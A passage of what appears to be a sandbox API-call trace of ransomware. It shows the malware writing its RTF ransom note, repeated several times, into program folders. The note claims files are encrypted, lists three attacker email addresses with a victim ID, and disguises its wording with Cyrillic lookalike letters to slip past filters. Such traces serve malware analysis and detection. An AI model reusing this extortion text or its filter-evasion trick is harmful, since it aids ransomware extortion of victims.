c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0071.059] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e971a8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1e971a8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0071.060] CloseHandle (hObject=0x1fc) returned 1 [0071.060] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\enu\\bg85_info.rtf")) returned 0xffffffff [0071.061] GetLastError () returned 0x2 [0071.061] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\enu\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0071.068] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0071.068] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 